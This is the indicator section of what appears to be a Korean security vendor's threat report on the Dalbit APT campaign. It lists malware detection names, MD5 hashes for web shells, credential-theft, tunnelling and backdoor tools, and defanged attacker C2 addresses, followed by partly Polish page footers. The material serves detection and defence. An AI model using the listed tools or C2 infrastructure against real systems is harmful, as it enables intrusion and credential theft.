Malware/Win64.Generic.C3628819 (2019.12.11.01)
Exploit/Win.Agent.C4448815 (2021.05.03.03)
Trojan/Win.Generic.C4963786 (2022.02.11.04)
Trojan/Win.Exploit.C4997833 (2022.03.08.01)
Exploit/Win.Agent.C5224192 (2022.08.17.00)
Exploit/Win.Agent.C5224193 (2022.08.17.00)
Trojan/Win32.RL_Mimikatz.R290617(2019.09.09.01)
Trojan/Win32.Mimikatz.R262842(2019.04.06.00)
Trojan/Win.Swrort.R450012(2021.11.14.01)
HackTool/Win.Lsassdump.R524859(2022.10.05.00)
HackTool/Win.ProxyVenom.C5280699(2022.10.15.01)
Unwanted/Win.Frpc.C5222534 (2022.08.13.01)
Unwanted/Win.Frpc.C5218508 (2022.08.03.03)
Unwanted/Win.Frpc.C5218510 (2022.08.03.03)
Unwanted/Win.Frpc.C5218513 (2022.08.03.03)
HackTool/Win.Frpc.5222544 (2022.08.13.01)
HackTool/Win.Frp.C4959080 (2022.02.08.02)
HackTool/Win.Frp.C5224195 (2022.08.17.00)
Unwanted/Win.Frpc.C5162558 (2022.07.26.03)
Malware/Win.Generic.C5173495 (2022.06.18.00)
HackTool/Win.LCX.C5192157 (2022.07.04.02)
HackTool/Win.LCX.R432995(2023.01.06.01)
HackTool/Win.Rsocx.C5280341(2022.10.15.00)
Backdoor/Win.BlueShell.C5272202(2022.10.05.00)
Trojan/Win.BlueShell.C5280704(2022.10.15.01)
Backdoor/Win.CobaltStrike.R360995(2022.09.20.00)
Unwanted/Win.Extractor.C5266516(2022.10.01.00)
Trojan/Win.RemCom.R237878(2023.01.07.00)
[IOC]
MD5 (정상 파일 제외)
– 웹쉘
0359a857a22c8e93bc43caea07d07e23
85a6e4448f4e5be1aa135861a2c35d35
4fc81fd5ac488b677a4c0ce5c272ffe3
c0452b18695644134a1e38af0e974172
6b4c7ea91d5696369dd0a848586f0b28
96b23ff19a945fad77dd4dd6d166faaa
88bef25e4958d0a198a2cc0d921e4384
c908340bf152b96dc0f270eb6d39437f
2c3de1cefe5cd2a5315a9c9970277bd7
e5b626c4b172065005d04205b026e446
27ec6fb6739c4886b3c9e21b6b9041b6
612585fa3ada349a02bc97d4c60de784
21c7b2e6e0fb603c5fdd33781ac84b8f
c44457653b2c69933e04734fe31ff699
e31b7d841b1865e11eab056e70416f1a
69c7d9025fa3841c4cd69db1353179cf
fca13226da57b33f95bf3faad1004ee0
af002abd289296572d8afadfca809294
e981219f6ba673e977c5c1771f86b189
f978d05f1ebeb5df334f395d58a7e108
e3af60f483774014c43a7617c44d05e7
c802dd3d8732d9834c5a558e9d39ed37
07191f554ed5d9025bc85ee1bf51f975
61a687b0bea0ef97224c7bd2df118b87
…(생략)
– 권한 상승
9fe61c9538f2df492dff1aab0f90579f
ab9091f25a5ad44bef898588764f1990
87e5c9f3127f29465ae04b9160756c62
ab9091f25a5ad44bef898588764f1990
4bafbdca775375283a90f47952e182d9
0311ee1452a19b97e626d24751375652
acacf51ceef8943f0ee40fc181b6f1fa
3cbea05bf7a1affb821e379b1966d89c
10f4a1df9c3f1388f9c74eb4cdf24e7c
b5bdf2de230722e1fe63d88d8f628ebc
edb685194f2fcd6a92f6e909dee7a237
e9bd5ed33a573bd5d9c4e071567808e5
fbae6c3769ed4ae4eccaff76af7e7dfe
937435bbcbc3670430bb762c56c7b329
fd0f73dd80d15626602c08b90529d9fd
29274ca90e6dcf5ae4762739fcbadf01
784becfb944dec42cccf75c8cf2b97e3
7307c6900952d4ef385231179c0a05e4
bcfca13c801608a82a0924f787a19e1d
75fe1b6536e94aaee132c8d022e14f85
d6cb8b66f7a9f3b26b4a98acb2f9d0c5
323a36c23e61c6b37f28abfd5b7e5dfe
7b40aa57e1c61ecd6db2a1c18e08b0af
3665d512be2e9d31fc931912d5c6900e
– 네트워크 스캔
1aca4310315d79e70168f15930cc3308
5e0845a9f08c1cfc7966824758b6953a
9b0e4652a0317e6e4da66f29a74b5ad7
d8d36f17b50c8a37c2201fbb0672200a
b998a39b31ad9b409d68dcb74ac6d97d
d5054ed83e63f911be46b3ff8af82267
e7b7bf4c2ed49575bedabdce2385c8d5
f01a9a2d1e31332ed36c1a4d2839f412
d4d8c9be9a4a6499d254e845c6835f5f
– FRP
4eb5eb52061cc8cf06e28e7eb20cd055
0cc22fd05a3e771b09b584db0a161363
8de8dfcb99621b21bf66a3ef2fcd8138
df8f2dc27cbbd10d944210b19f97dafd
2866f3c8dfd5698e7c58d166a5857e1e
cbee2fd458ff686a4cd2dde42306bba1
3dc8b64b498220612a43d36049f055ab
31c4a3f16baa5e0437fdd4603987b812
b33a27bfbe7677df4a465dfa9795ff4a
7d9c233b8c9e3f0ea290d2b84593c842
c4f18576fd1177ba1ef54e884cb7a79d
5d33609af27ea092f80aff1af6ddf98d
622f060fce624bdca9a427c3edec1663
1f2432ec77b750aa3e3f72c866584dc3
d331602d190c0963ec83e46f5a5cd54a
21d268341884c4fc62b5af7a3b433d90
– FRP_INI
6a20945ae9f7c9e1a28015e40758bb4f
a29f39713ce6a92e642d14374e7203f0
7ce988f1b593e96206a1ef57eb1bec8a
fc9abba1f212db8eeac7734056b81a6e
9f55b31c66a01953c17eea6ace66f636
33129e959221bf9d5211710747fddabe
48b99c2f0441f5a4794afb4f89610e48
28e026b9550e4eb37435013425abfa38
2ceabffe2d40714e5535212d46d78119
c72750485db39d0c04469cd6b100a595
68403cc3a6fcbeb9e5e9f7263d04c02f
52ff6e3e942ac8ee012dcde89e7a1116
d82481e9bc50d9d9aeb9d56072bf3cfe
22381941763862631070e043d4dd0dc2
6b5bccf615bf634b0e55a86a9c24c902
942d949a28b2921fb980e2d659e6ef75
059d98dcb83be037cd9829d31c096dab
cca50cdd843aa824e5eef5f05e74f4a5
f6f0d44aa5e3d83bb1ac777c9cea7060
0ca345bc074fa2ef7a2797b875b6cd4d
f6da8dc4e1226aa2d0dabc32acd06915
0bbfaea19c8d1444ae282ff5911a527b
– LCX
a69d3580921ec8adce64c9b38ac3653a
c4e39c1fc0e1b165319fa533a9795c44
fb6bf74c6c1f2482e914816d6e97ce09
678dbe60e15d913fb363c8722bde313d
– 프록시 ETC
e0f4afe374d75608d604fbf108eac64f
f5271a6d909091527ed9f30eafa0ded6
ae8acf66bfe3a44148964048b826d005
– 측면이동
6983f7001de10f4d19fc2d794c3eb534
fcb7f7dab6d401a17bd436fc12a84623
– 정보 수집 및 자격 증명 탈취
bb8bdb3e8c92e97e2f63626bc3b254c4
80f421c5fd5b28fc05b485de4f7896a1
a03b57cc0103316e974bbb0f159f78f6
46f366e3ee36c05ab5a7a319319f7c72
7bd775395b821e158a6961c573e6fd43
b434df66d0dd15c2f5e5b2975f2cfbe2
c17cfe533f8ce24f0e41bd7e14a35e5e
– 백도어
011cedd9932207ee5539895e2a1ed60a
bc744a4bf1c158dba37276bf7db50d85
23c0500a69b71d5942585bb87559fe83
53271b2ab6c327a68e78a7c0bf9f4044
c87ac56d434195c527d3358e12e2b2e0
C2 및 URL (악용된 국내 기업 서버의 경우 표기 안함)
– Download C2
91.217.139[.]117
– Upload C2
205.185.122[.]95
91.217.139[.]117
– FRP & LCX C2
hxxp://sk1.m00nlight[.]top:80 (45.136.186.19) //MOACK_Co_LTD 업체 서버
hxxps://fk.m00nlight[.]top:443 (45.136.186.175:443) //MOACK_Co_LTD 업체 서버
hxxps://aa.zxcss[.]com:443 (45.93.31.122) //MOACK_Co_LTD 업체 서버
45.93.31[.]75:7777 //MOACK_Co_LTD 업체 서버
45.93.28[.]103:8080 //MOACK_Co_LTD 업체 서버
103.118.42[.]208
101.43.121[.]50
– Backdoor C2
45.93.31[.]75 //MOACK_Co_LTD 업체 서버
연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.
CATEGORIES:악성코드 정보
TAGGED AS:ANTSWORD,APT,ASPXSPY,BADPOTATO,BITLOCKER,BITSADMIN,BLUESHELL,CERTUTIL,CHOPPER,COBALTSTRIKE,CONF.ASPX,CVE-2017-10271,CVE-2018-8639,CVE-2019-1458,DALBIT,DUHGGHMPERT.DMP,DUMPERT,달빗,EFSPOTATO,FF0.123456,FRP,FSCAN,GODZILLA,GOTOHTTP, HTRAN , ZŁOŚLIWE OPROGRAMOWANIE , KAMPANIA , JUICYPOTATO , LADON , LCX , M00NLIGHT , GŁÓWNY , MIMIKATZ , NPS , NTLTEST , PROCDUMP , RDP , REGEORG , ROTTENPOTATO , RSYNC , SWEETPOTATO , WEBLOGIC , XP_CMDSHELL
Wznowienie krajowej dystrybucji Magniber Ransomware (1/28)Cotygodniowe statystyki ASEC dotyczące złośliwego oprogramowania (20230123 ~ 20230129)
5
ocena w skali gwiazdkowej
Zaloguj sie
Gość
Bądź pierwszy który skomentuje!
0 KOMENTARZY
Szukaj...
SZAFKA
SZAFKA
Wybierz miesiąc
OTRZYMYWAĆ WIADOMOŚCI
Świergot
kanał RSS
220 Pangyoyeok-ro, Bundang-gu, Seongnam-si, Gyeonggi-do, 13493 | CEO: Kang Seok-kyun | Numer rejestracyjny firmy: 214-81-83536 | Polityka prywatności
© AhnLab, Inc. Wszelkie prawa zastrzeżone.
Witryna rodzinna
Korea (koreański)
Brak komentarzy:
Prześlij komentarz
Proszę zostaw swój komentarz w celu dopowiedzenia tego czego ja nie wiedziałem lub wywołania ciekawej dyskusji. Wprowadziłem moderowanie komentarzy ze względu na dużą popularność bloga wśród różnych SEO botów :)